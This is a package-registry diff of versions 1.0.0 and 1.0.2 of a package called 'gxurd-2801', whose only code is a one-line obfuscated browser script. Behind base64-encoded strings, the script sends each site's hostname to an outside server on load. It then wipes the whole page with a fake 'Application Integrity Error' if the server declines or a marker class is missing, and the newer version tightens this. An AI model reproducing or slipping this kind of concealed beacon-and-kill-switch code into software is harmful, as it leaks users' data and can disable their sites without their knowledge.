gxurd-2801 1.0.0 → 1.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -1 +1 @@
1
- !function(){if("undefined"==typeof window)return;const e=t=>atob(t),c=e("UFVMX1BCRVJfR1JOWl9QVUxfOUsyTg==");try{fetch(e("aHR0cHM6Ly9raXJvbi5mZW5peGNvZGVyLmNvbS9kb21haW4="),{method:"POST",headers:{"Content-Type":"application/json"},body:JSON.stringify({d:location.hostname})})}catch(t){}document.body&&!document.body.classList.contains(c)&&(document.documentElement.innerHTML='<div><div><h1>'+e("QXBwbGljYXRpb24gSW50ZWdyaXR5IEVycm9y")+'</h1></div></div>',function(){throw new Error(e("Q0hZX0NPUkU6IFNJR05BVFVSRV9NSVNTSU5H"))}())}();
1
+ !async function(){const e=t=>atob(t),c=e("UFVMX1BCRVJfR1JOWl9QVUxfOUsyTg=="),b=document.body;if(!b)return void(document.documentElement.innerHTML="");try{const t=await fetch(e("aHR0cHM6Ly9raXJvbi5mZW5peGNvZGVyLmNvbS9kb21haW4v"),{method:"POST",headers:{"Content-Type":"application/json"},body:JSON.stringify({d:location.hostname})}),o=await t.json();if(!o.success)throw document.documentElement.innerHTML="<div><div><h1>"+e("QXBwbGljYXRpb24gSW50ZWdyaXR5IEVycm9y")+"</h1><p>"+e("RG9tYWluIGlzIGluYWN0aXZlLg==")+"</p></div></div>",new Error(e("RE9NQUlOX0lOQUNUSVZF"))}catch(t){throw document.documentElement.innerHTML="<div><div><h1>"+e("QXBwbGljYXRpb24gSW50ZWdyaXR5IEVycm9y")+"</h1><p>"+e("VW5hYmxlIHRvIHZlcmlmeSBsaWNlbnNlLg==")+"</p></div></div>",t}if(!b.classList.contains(c))throw document.documentElement.innerHTML="<div><div><h1>"+e("QXBwbGljYXRpb24gSW50ZWdyaXR5IEVycm9y")+"</h1><p>"+e("Q0hZX0NPUkUgdmFsaWRhdGlvbiBmYWlsZWQu")+"</p></div></div>",new Error(e("Q0hZX0NPUkU6IFNJR05BVFVSRV9NSVNTSU5H"))}();
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "gxurd-2801",
3
- "version": "1.0.0",
3
+ "version": "1.0.2",
4
4
  "main": "index.js",
5
5
  "sideEffects": true
6
6
  }